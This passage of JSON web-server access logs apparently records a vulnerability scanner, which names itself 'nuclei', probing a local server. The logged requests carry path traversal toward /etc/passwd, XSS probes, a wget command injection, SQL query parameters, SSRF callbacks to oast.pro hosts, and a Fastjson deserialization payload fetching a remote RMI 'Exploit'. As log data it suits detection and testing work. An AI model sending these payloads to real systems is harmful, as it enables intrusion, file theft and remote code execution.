"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elmah.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET http://ca28bc0smpvbbtig07h0hwaai8fepnse1.oast.pro/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET @ca28bc0smpvbbtig07h0agyexp6tr4inh.oast.pro/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"{\x0D\x0A \x22a\x22:{\x0D\x0A \x22@type\x22:\x22java.lang.Class\x22,\x0D\x0A \x22val\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22\x0D\x0A },\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca28bc0smpvbbtig07h0z5s6usdmrt7jc.oast.pro/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ca28bc0smpvbbtig07h083bhsrwn3ybz8.oast.pro:80/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.snyk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"action=verify-haras","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/rpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/babel/redirect.php?newurl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.cnf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/C%3a%2fwindows%2fsystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /guest_auth/guestIsUp.php","status":"400","body_bytes_sents":"154","req_time":"0.265","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get_device_details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/assets/base/home.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"{{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /front/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/html2canvasproxy.php?url=https://ca28bc0smpvbbtig07h05tgpqtqu5cj4u.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /(download)/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/composer/installed.json HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.004","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) 